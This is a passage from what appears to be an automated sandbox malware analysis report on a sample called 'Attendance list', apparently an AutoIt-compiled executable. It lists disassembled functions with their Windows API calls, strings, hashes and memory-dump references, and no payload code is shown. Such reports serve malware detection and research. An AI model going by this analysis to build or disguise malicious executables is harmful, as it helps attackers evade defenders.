                        • Opcode Fuzzy Hash: 1c2c3cc59c03a545672596fa1d295b16b3945ffaf8c8c9a1ed4331be2f3a6d86
                        • Instruction Fuzzy Hash: F0F06235315209AFEB210FA5DC9DEAB3BACEF8A794B000425F945C6150CB719C81EA60
                        Function 00918652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00918669
                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00918673
                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00918682
                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00918689
                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0091869F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: HeapInformationToken$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 44706859-0
                        • Opcode ID: e73ec5965b4003cca38841329854bcabeefb31410351b6c7293fc618ce887df4
                        • Instruction ID: 11d3edaab6967aa2a3f8917b5d59c30d6c5d0e29209d285f004057373d4ded93
                        • Opcode Fuzzy Hash: e73ec5965b4003cca38841329854bcabeefb31410351b6c7293fc618ce887df4
                        • Instruction Fuzzy Hash: A2F06279314309BFEB211FA5EC98EA73BACEF8A794B100025F945C6150CB71DD41EA60
                        Function 0091C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetDlgItem.USER32(?,000003E9), ref: 0091C6BA
                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0091C6D1
                        • MessageBeep.USER32(00000000), ref: 0091C6E9
                        • KillTimer.USER32(?,0000040A), ref: 0091C705
                        • EndDialog.USER32(?,00000001), ref: 0091C71F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                        • String ID:
                        • API String ID: 3741023627-0
                        • Opcode ID: b232a1f9d02b07374c209ec5a1166f4a921de1ece6a978f1e123ec715ecd92d2
                        • Instruction ID: 37df081471511a1005a94db7a20be1918e8dacdd72587ee346d5f6547ac486f8
                        • Opcode Fuzzy Hash: b232a1f9d02b07374c209ec5a1166f4a921de1ece6a978f1e123ec715ecd92d2
                        • Instruction Fuzzy Hash: C801A27455470DABEB205B20DD5EFA677B8FF01745F000669F542A14E0DBF4A9949F80
                        Function 008C13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                        Download Yara Rule
                        APIs
                        • EndPath.GDI32(?), ref: 008C13BF
                        • StrokeAndFillPath.GDI32(?,?,008FBAD8,00000000,?), ref: 008C13DB
                        • SelectObject.GDI32(?,00000000), ref: 008C13EE
                        • DeleteObject.GDI32 ref: 008C1401
                        • StrokePath.GDI32(?), ref: 008C141C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Path$ObjectStroke$DeleteFillSelect
                        • String ID:
                        • API String ID: 2625713937-0
                        • Opcode ID: 2ea129bddd9330d4a1c496e46c985c734471ff18e8429888af534326742541f2
                        • Instruction ID: eb9c6d6c3d6eb3192589c0e864edf840a923e572e51dc4352e005fb1287539c2
                        • Opcode Fuzzy Hash: 2ea129bddd9330d4a1c496e46c985c734471ff18e8429888af534326742541f2
                        • Instruction Fuzzy Hash: 11F01434028249EBDB255F26EC5CB583FB5FB42326F148228E429882F2C7358995EF10
                        Function 0092C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                        Download Yara Rule
                        APIs
                        • CoInitialize.OLE32(00000000), ref: 0092C69D
                        • CoCreateInstance.OLE32(00952D6C,00000000,00000001,00952BDC,?), ref: 0092C6B5
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                        • CoUninitialize.OLE32 ref: 0092C922
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CreateInitializeInstanceUninitialize_memmove
                        • String ID: .lnk
                        • API String ID: 2683427295-24824748
                        • Opcode ID: 5e528283e5f2a9991622f7ea3a8ebd7874b27a3c483232c7cf558fcfcb328e25
                        • Instruction ID: f9d6ddca6eb3d764ff075e11a4eebf2675942c6da0292f8056b404061fc11d32
                        • Opcode Fuzzy Hash: 5e528283e5f2a9991622f7ea3a8ebd7874b27a3c483232c7cf558fcfcb328e25
                        • Instruction Fuzzy Hash: 91A10871108205AFD700EF68C895EABB7B8FF95744F00495CF196D72A2DB70EA49CB52
                        Function 008D2E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008E0FF6: std::exception::exception.LIBCMT ref: 008E102C
                          • Part of subcall function 008E0FF6: __CxxThrowException@8.LIBCMT ref: 008E1041
                          • Part of subcall function 008C7F41: _memmove.LIBCMT ref: 008C7F82
                          • Part of subcall function 008C7BB1: _memmove.LIBCMT ref: 008C7C0B
                        • __swprintf.LIBCMT ref: 008D302D
                        Strings
                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 008D2EC6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                        • API String ID: 1943609520-557222456
                        • Opcode ID: ac3a374c1bbcf631ca0ec64ca513482aed9274378b0f4b58ba974a14acceaf25
                        • Instruction ID: db0924989b27de2ffa531b3c52abe7babc0a57a5c65f784c9fe786f81dceaa5f
                        • Opcode Fuzzy Hash: ac3a374c1bbcf631ca0ec64ca513482aed9274378b0f4b58ba974a14acceaf25
                        • Instruction Fuzzy Hash: 949136711086429FCB18EF28D985D6EB7B8FF85750F00491EF586DB2A1DA70EE44CB52
                        Function 0092BBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008C48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008C48A1,?,?,008C37C0,?), ref: 008C48CE
                        • CoInitialize.OLE32(00000000), ref: 0092BC26
                        • CoCreateInstance.OLE32(00952D6C,00000000,00000001,00952BDC,?), ref: 0092BC3F
                        • CoUninitialize.OLE32 ref: 0092BC5C
                          • Part of subcall function 008C9997: __itow.LIBCMT ref: 008C99C2
                          • Part of subcall function 008C9997: __swprintf.LIBCMT ref: 008C9A0C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                        • String ID: .lnk
                        • API String ID: 2126378814-24824748
                        • Opcode ID: ed8b3c67abc5a1a6cfcf95733562790c6043e7d4272ac3ead366609f5ddc3416
                        • Instruction ID: ba6d1114e83dbd22f5da67b8de09196196fc1343b07d3d868e17af9db18334eb
                        • Opcode Fuzzy Hash: ed8b3c67abc5a1a6cfcf95733562790c6043e7d4272ac3ead366609f5ddc3416
                        • Instruction Fuzzy Hash: 4DA122752042159FCB00DF18C484E6ABBF9FF89714F158998F8999B3A1CB31ED45CB92
                        Function 008E524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                        Download Yara Rule
                        APIs
                        • __startOneArgErrorHandling.LIBCMT ref: 008E52DD
                          • Part of subcall function 008F0340: __87except.LIBCMT ref: 008F037B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ErrorHandling__87except__start
                        • String ID: pow
                        • API String ID: 2905807303-2276729525
                        • Opcode ID: 2b7512f18581a52d566d78d152bda5054cda812ce9c73e22eb0380b69df18172
                        • Instruction ID: 8c850badc4ad8c3616eb3aa99ff840ccd6d92da16888bf8647e59884c40aa0a3
                        • Opcode Fuzzy Hash: 2b7512f18581a52d566d78d152bda5054cda812ce9c73e22eb0380b69df18172
                        • Instruction Fuzzy Hash: 7C518B21A1D7499BCB10673AC91137E6790FB1275CF208958E2D5C13E7EE748CC4AE4A
                        Function 008E023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID: #$+
                        • API String ID: 0-2552117581
                        • Opcode ID: 9a5bb648f3763926cf8de6d1ec0a15b15ddc2f9aa341000adfa037299c1121a8
                        • Instruction ID: e7393d202e8061a633947effaf2684a5118d27a22d7590fc7705f9e02bd8887b
                        • Opcode Fuzzy Hash: 9a5bb648f3763926cf8de6d1ec0a15b15ddc2f9aa341000adfa037299c1121a8
                        • Instruction Fuzzy Hash: 2D51137920428ACFCF159F29D488AF97BB8FF96310F164059E8919B2E0D7749CC2CB61
                        Function 008D62F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _memset$_memmove
                        • String ID: ERCP
                        • API String ID: 2532777613-1384759551
                        • Opcode ID: 08a7076c8073e674bde81062752d6c1e38ea00e3ef2bc4fad591ad9c9e710a83
                        • Instruction ID: 2358ab3d904c6de841e7bdeff9152dd47b4f17e0a388b4b39c36e2f5e49c1c0e
                        • Opcode Fuzzy Hash: 08a7076c8073e674bde81062752d6c1e38ea00e3ef2bc4fad591ad9c9e710a83
                        • Instruction Fuzzy Hash: 4651A07190070D9BCB24CF65C8857AABBF5FF04314F20866EE64ACB241F7709694CB45
                        Function 00947BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                        Download Yara Rule
                        APIs
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0094F910,00000000,?,?,?,?), ref: 00947C4E
                        • GetWindowLongW.USER32 ref: 00947C6B
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00947C7B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Window$Long
                        • String ID: SysTreeView32
                        • API String ID: 847901565-1698111956
                        • Opcode ID: 34c6d485469865dcb6d370ca6d689c41d45734d4575fdf893e317d9beabfc676
                        • Instruction ID: 4a5e80988c87b2b51ce0f401e3c0011778bfe70ac52bc9a2cbc7f3ec3137df57
                        • Opcode Fuzzy Hash: 34c6d485469865dcb6d370ca6d689c41d45734d4575fdf893e317d9beabfc676
                        • Instruction Fuzzy Hash: 3B31B03161420AABDB118F78DC45FEAB7A9FB45324F204729F8B5E22E0C731E8509B50
                        Function 00947648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 009476D0
                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 009476E4
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00947708
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSend$Window
                        • String ID: SysMonthCal32
                        • API String ID: 2326795674-1439706946
                        • Opcode ID: 0d9e973260738f20f14e8f85aaf5dd99dc4d90b044a01e0b13ccb0c344d1472c
                        • Instruction ID: 020c8a641be787ad2c3fe7d50075343c696aad76fbf352d331d165c24e8cd1bf
                        • Opcode Fuzzy Hash: 0d9e973260738f20f14e8f85aaf5dd99dc4d90b044a01e0b13ccb0c344d1472c
                        • Instruction Fuzzy Hash: BA21A132514219BBDF15CFA4CC46FEA3B79EF88754F110214FE156B1D0DBB5A8509BA0
                        Function 00946F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00946FAA
                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00946FBA
                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00946FDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSend$MoveWindow
                        • String ID: Listbox
                        • API String ID: 3315199576-2633736733
                        • Opcode ID: 21d0214117a11086c758e7c62402d52c74e787b58670e0dc29e5e1b37b68f772
                        • Instruction ID: f0f7d7bc413d879deb62003c767996903015ca8d30f9fc0bec4ef014a5498ed3
                        • Opcode Fuzzy Hash: 21d0214117a11086c758e7c62402d52c74e787b58670e0dc29e5e1b37b68f772
                        • Instruction Fuzzy Hash: 2421C272610218BFEF118F54DC85FAB3BBEEF8A754F018164FA449B190C671AC55DBA0
                        Function 0094797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009479E1
                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009479F6
                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00947A03
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: msctls_trackbar32
                        • API String ID: 3850602802-1010561917
                        • Opcode ID: 53aacda5eb9b997ceb9d2e36b37b65e1416a4a70ea6043567edc0031ef767b31
                        • Instruction ID: 677d63ab49e0ac52c2e8f5c5de1bd24191ac73bd19649798bbb144dc16e28ba2
                        • Opcode Fuzzy Hash: 53aacda5eb9b997ceb9d2e36b37b65e1416a4a70ea6043567edc0031ef767b31
                        • Instruction Fuzzy Hash: 1011E332254248BAEF149FA4CC05FAB77ADEFC9B68F024519FA45A6090D371D811DB60
                        Function 008C4C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,008C4C2E), ref: 008C4CA3
                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008C4CB5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetNativeSystemInfo$kernel32.dll
                        • API String ID: 2574300362-192647395
                        • Opcode ID: 19418989b65533bc8361a8397166d4bc5ad7dea83ccda63e7ee15e382097f0c1
                        • Instruction ID: da2bff07ec8ea833aa565212393b5eeb7ac57d07c5d50edefb3872c14c69397b
                        • Opcode Fuzzy Hash: 19418989b65533bc8361a8397166d4bc5ad7dea83ccda63e7ee15e382097f0c1
                        • Instruction Fuzzy Hash: 90D01775924723CFD7209F31DA38E0676E5EF0A799B11883E988AD6160E670D8C0CA50
                        Function 008C4D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,008C4CE1,?), ref: 008C4DA2
                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008C4DB4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                        • API String ID: 2574300362-1355242751
                        • Opcode ID: 2755cd61e38c1a594df342712fe26a5fa6d1bcaf8b5f1c5bf9c0f2ab9fa0187d
                        • Instruction ID: 290711d1872bd688c1efbc7bd9413e4ab730bad50636bbf728315c77917db31e
                        • Opcode Fuzzy Hash: 2755cd61e38c1a594df342712fe26a5fa6d1bcaf8b5f1c5bf9c0f2ab9fa0187d
                        • Instruction Fuzzy Hash: 9CD0E275A68713CFD720AF71D828E46B6E4EF0A399B11887ED88AD6150E770D880CA50
                        Function 008C4D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,008C4D2E,?,008C4F4F,?,009862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008C4D6F
                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008C4D81
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                        • API String ID: 2574300362-3689287502
                        • Opcode ID: c2d1bf45bb339d19c5cc871c3fed037f16190ddf9ea84337a57981597178cf04
                        • Instruction ID: b60a5107c4766cf6176b811714a501046d78269834d16f8da7b67647dc21b683
                        • Opcode Fuzzy Hash: c2d1bf45bb339d19c5cc871c3fed037f16190ddf9ea84337a57981597178cf04
                        • Instruction Fuzzy Hash: 22D01275514713CFD7205F71D828F1676E8FF16355B11C97D9887D6650E670D4C0CA50
                        Function 00941072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(advapi32.dll,?,009412C1), ref: 00941080
                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00941092
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
